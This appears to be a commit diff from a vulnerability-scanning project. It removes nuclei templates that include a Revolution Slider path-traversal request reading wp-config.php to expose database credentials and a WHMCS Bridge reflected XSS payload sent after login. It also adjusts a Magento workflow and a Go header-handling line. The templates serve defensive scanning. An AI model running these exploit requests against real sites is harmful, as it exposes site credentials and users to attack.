23	-	- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
24	-
25	-	matchers-condition: and
26	-	matchers:
27	-	- type: word
28	-	part: body
29	-	words:
30	-	- "'DB_NAME'"
31	-	- "'DB_PASSWORD'"
32	-	- "'DB_USER'"
33	-	condition: and
34	-
35	-	- type: status
36	-	status:
37	-	- 200
38	-
39	-	# Enhanced by mp on 2022/07/29
40	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wp-whmcs-xss.yaml

1	-	id: wp-whmcs-xss
2	-
3	-	info:
4	-	name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
5	-	author: dhiyaneshDk
6	-	severity: medium
7	-	description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
8	-	reference:
9	-	- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
10	-	tags: wordpress,wp-plugin,authenticated,whmcs,xss
11	-
12	-	requests:
13	-	- raw:
14	-	- \|
15	-	POST /wp-login.php HTTP/1.1
16	-	Host: {{Hostname}}
17	-	Origin: {{RootURL}}
18	-	Content-Type: application/x-www-form-urlencoded
19	-	Cookie: wordpress_test_cookie=WP%20Cookie%20check
20	-
21	-	log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
22	-	- \|
23	-	GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
24	-	Host: {{Hostname}}
25	-
26	-	cookie-reuse: true
27	-	matchers-condition: and
28	-	matchers:
29	-	- type: word
30	-	part: body
31	-	words:
32	-	- "<strong><img src onerror=alert(document.domain)></strong>"
33	-	condition: and
34	-
35	-	- type: word
36	-	part: header
37	-	words:
38	-	- text/html
39	-
40	-	- type: status
41	-	status:
42	-	- 200
43	-

■ ■ ■ ■ ■ ■

config/nuclei-templates/workflows/magento-workflow.yaml

		skipped 7 lines
8	8		workflows:
9	9		- template: technologies/magento-detect.yaml
10	10		subtemplates:
11		-	- template: exposures/configs/magento-config.yaml
12		-	- template: exposed-panels/magento-admin-panel.yaml
13		-	- template: vulnerabilities/magento/
	11	+	- tags: magento

lib/util/Const.go

Binary file.

■ ■ ■ ■ ■ ■

pkg/naabu/v2/pkg/runner/runner.go

		skipped 78 lines
79	79		var a []string
80	80		a = append(a, httpxoptions.CustomHeaders...)
81	81		opts["CustomHeaders"] = a
82		-	util.CustomHeaders = a
	82	+	util.CustomHeaders = append(util.CustomHeaders, a...)
83	83		}
84	84		//var axx1 []*runner2.Runner
85	85		defer func() { <-nucleiDone }()
		skipped 672 lines

up PoCs 2022-08-29